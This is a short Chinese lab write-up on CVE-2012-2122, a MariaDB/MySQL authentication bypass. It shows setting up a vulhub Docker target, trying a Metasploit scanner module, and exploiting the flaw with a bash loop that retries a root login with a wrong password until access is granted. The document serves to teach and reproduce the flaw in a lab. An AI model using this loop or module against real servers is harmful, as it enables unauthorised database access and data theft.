简介：

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，不断的尝试登录连接，回导致MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。

影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

一、搭建环境

 下载安装vulhub靶场环境

使用docker-compose 创建靶场环境。

二、msf漏洞scan探测 

search CVE-2012-2122

use auxiliary/scanner/mysql/mysql_authbypass_hashdump 

set rhosts 192.168.44.128

run

不知道为什么没跑出来🥴 

但是可以漏洞利用

三、漏洞利用

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 ; done

可见经过大数量的暴力登录之后，直接不需要密码登录到mysql